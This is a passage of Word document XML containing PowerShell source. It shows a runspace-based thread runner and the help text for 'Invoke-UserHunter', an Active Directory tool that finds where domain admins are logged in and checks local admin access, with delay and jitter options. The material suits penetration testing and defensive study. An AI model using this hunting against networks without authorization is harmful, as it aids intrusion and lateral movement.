    <w:p w14:paraId="49C675E1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="5DA51C9E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                While ($($Pool.GetAvailableRunspaces()) -le 0) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2247B81C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    Start-Sleep -MilliSeconds 500</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="346ED46D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AD833AA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="7342C0F8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                # create a "powershell pipeline runner"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62F1DD7B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $p = [powershell]::create()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73CAAD65" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="416AE33E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $p.runspacepool = $Pool</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C9C9C90" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="5F2F0E63" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                # add the script block + arguments</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B47D025" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $Null = $p.AddScript($ScriptBlock).AddParameter('ComputerName', $Computer)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D08EFA8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                if($ScriptParameters) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ADF0687" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    ForEach ($Param in $ScriptParameters.GetEnumerator()) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="390A44AE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        $Null = $p.AddParameter($Param.Name, $Param.Value)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59F9A6AB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="597BD7B2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F0E9EE1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="6EF2080F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $o = New-Object Management.Automation.PSDataCollection[Object]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="562C1E0F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="758A13F7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $Jobs += @{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D2CE7DC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    PS = $p</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EC7C9F3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    Output = $o</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="619B3FC0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    Result = $method.Invoke($p, @($null, [Management.Automation.PSDataCollection[Object]]$o))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BE985BD" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68BC6718" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ECBEFD8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10BCE912" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A460279" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="2AD9B8DF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    end {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D95FF7A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Write-Verbose "Waiting for threads to finish..."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E76DB8F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="30D2010D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Do {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="037F0C32" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            ForEach ($Job in $Jobs) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C037DAE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $Job.Output.ReadAll()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CF959CB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34F6BBEE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        } While (($Jobs | Where-Object { ! $_.Result.IsCompleted }).Count -gt 0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7894649C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="6FE4BBFD" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        ForEach ($Job in $Jobs) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="350CDAE9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $Job.PS.Dispose()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4936FC2E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D753AE3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="75610FEC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Pool.Dispose()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27ACBB6F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Write-Verbose "All threads completed!"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="289F5DFA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04E512B2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="630AE618" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="3429FFBC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="4A44A10B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>function Invoke-UserHunter {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45E3035B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>&lt;#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3104842A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .SYNOPSIS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="154F0B63" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="14749D6C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Finds which machines users of a specified group are logged into.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58C80483" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="0C61EBFC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Author: @harmj0y</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23A6E695" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        License: BSD 3-Clause</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54E8B945" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="7F186F6B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    .DESCRIPTION</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67775687" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="683F6038" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        This function finds the local domain name for a host using Get-NetDomain,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="625B22C0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        queries the domain for users of a specified group (default "domain admins")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D511ADB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        with Get-NetGroupMember or reads in a target user list, queries the domain for all</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B802E1C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        active machines with Get-NetComputer or reads in a pre-populated host list,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F75A6E3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        randomly shuffles the target list, then for each server it gets a list of</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F902D93" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        active users with Get-NetSession/Get-NetLoggedon. The found user list is compared</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09315BD0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        against the target list, and a status message is displayed for any hits.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="459BF455" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        The flag -CheckAccess will check each positive host to see if the current</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AF93C72" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        user has local admin access to the machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1690938B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="437902D4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER ComputerName</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="146E55DC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="67E0A067" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Host array to enumerate, passable on the pipeline.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F767433" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="6E5487C4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER ComputerFile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BE94FBB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="00A49792" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        File of hostnames/IPs to search.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45577F53" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="48BC7157" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER ComputerFilter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0054E1EA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="536B702D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Host filter name to query AD for, wildcards accepted.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BBB4198" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="39D044E0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER ComputerADSpath</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05EF2B5B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="435EFDB4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        The LDAP source to search through for hosts, e.g. "LDAP://OU=secret,DC=testlab,DC=local"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E37AC59" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Useful for OU queries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28DB9086" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="0A443562" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    .PARAMETER Unconstrained</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75C095C3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="783E5DA3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Switch. Only enumerate computers that have unconstrained delegation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B9B238A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="59AF1935" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER GroupName</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D66E950" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="60115A7B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Group name to query for target users.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14C91846" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="01B4E503" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER TargetServer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13C264AE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="239D30B8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Hunt for users who are effective local admins on a target server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6062D497" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="4A828537" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER UserName</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C3D5917" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="288F6D1F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Specific username to search for.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="215A06B8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="15C08D20" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER UserFilter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16F2B4A8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="78095510" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        A customized ldap filter string to use for user enumeration, e.g. "(description=*admin*)"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19114452" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="4676BADB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER UserADSpath</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53EB3ED2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="02D5E146" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        The LDAP source to search through for users, e.g. "LDAP://OU=secret,DC=testlab,DC=local"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="622FEBE1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Useful for OU queries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63791272" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="36C58BFC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER UserFile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="539823F4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="0EA82694" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        File of usernames to search for.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63DCB48F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="2507C604" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    .PARAMETER AdminCount</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="364448CB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="74A95634" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Switch. Hunt for users with adminCount=1.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F5D0D84" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="4FDC47E9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER AllowDelegation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50BF9002" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="600478D0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Switch. Return user accounts that are not marked as 'sensitive and not allowed for delegation'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="269BA678" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="3C4E1A71" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER StopOnSuccess</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B593A85" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="4926AF25" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Switch. Stop hunting after finding after finding a target user.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C1A0C6F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="3E5BF10A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER NoPing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="683AEA11" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="37327B6C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Don't ping each host to ensure it's up before enumerating.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26B5B1A2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="236C4DB3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER CheckAccess</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CED8833" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="0F8EBA89" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Switch. Check if the current user has local admin access to found machines.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7196E179" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="4454D8A4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER Delay</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0607E4D2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="77E20C93" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Delay between enumerating hosts, defaults to 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36095DC3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="205ECD25" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER Jitter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FF0CCF8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="03F43FB5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Jitter for the host delay, defaults to +/- 0.3</w:t>
      </w:r>
    </w:p>
